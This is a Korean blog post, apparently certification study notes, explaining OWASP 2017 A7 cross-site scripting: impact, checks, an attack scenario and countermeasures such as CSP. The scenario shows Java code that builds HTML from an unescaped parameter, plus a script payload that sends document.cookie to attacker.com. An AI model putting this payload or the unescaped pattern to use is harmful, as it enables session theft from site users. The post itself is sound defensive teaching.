1. 개요
OWASP TOP10에서 두 번째로 많이 발생하는 문제. 응용프로그램의 약 2/3에서 발견된다.
2. 영향
피해자의 브라우저에서 원격 코드를 실행하여 세션 정보를 훔치거나 피해자에게 악성코드를 전달한다.
XSS 공격은 세션 도용, 계정 탈취, 다중 요소 인증 우회, 트로이 목마 악성코드 배포 로그인 패널과 같은 DOM 노드 대체 혹은 변조, 악성코드 다운로드, 키 로깅 사용자 브라우저에 대한 공격을 포함한다.
3. 취약점 확인
1) 리플렉티드 XSS : 유효성이 확인되지 않고, 특수문자가 필터 되지 않았는가?
2) 저장 XSS : 다른 사용자 또는 관리자가 볼 수 있는 정제되지 않은 사용자 입력값이 저장되는가?
3) DOM 기반 XSS : 페이지에 공격자가 제어 가능한 데이터를 동적으로 포함할 수 있는 자바스크립트 프레임워크, API 등을 사용하고 있는가?
4. 시나리오
1) 공격자는 브라우저 내에서 "CC" 파라미터를 조작한다.
(String) page += "<input name='creditcard' type='TEXT'
value='" + request.getParameter("CC") + "'>";
// CC 안에 공격을 위해 넣을 내용
'><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>'.
5. 보안 대책
1) XSS를 자동으로 필터링 처리하는 프레임워크 사용
2) 신뢰할 수 없는 HTTP 요청 데이터 필터링.
3) 브라우저 API에 유사한 문낵감지 필터링 기술 적용
4) CSP(컨텐츠 보안 정책) 활성화.
* CSP에 관한 글
콘텐츠 보안 정책 - 위키백과, 우리 모두의 백과사전 (wikipedia.org)
콘텐츠 보안 정책 - 위키백과, 우리 모두의 백과사전
위키백과, 우리 모두의 백과사전. 콘텐츠 보안 정책(Content Security Policy, CSP)은 신뢰된 웹 페이지 콘텍스트에서 악의적인 콘텐츠를 실행하게 하는 사이트 간 스크립팅(XSS), 클릭재킹, 그리고 기타
ko.wikipedia.org
'Security > 정보보안기사' 카테고리의 다른 글
| [OWASP 2017] A9 알려진 취약점이 있는 구성 요소 사용 (0) | 2023.01.28 |
|---|---|
| [OWASP 2017] A8 안전하지 않은 역직렬화 (0) | 2023.01.28 |
| [OWASP 2017] A6 잘못된 보안 구성 (0) | 2023.01.27 |
| [OWASP 2017] A5 취약한 접근 통제 (0) | 2023.01.27 |
| [OWASP 2017] A4 XML 외부 개체(XXE) (0) | 2023.01.26 |
댓글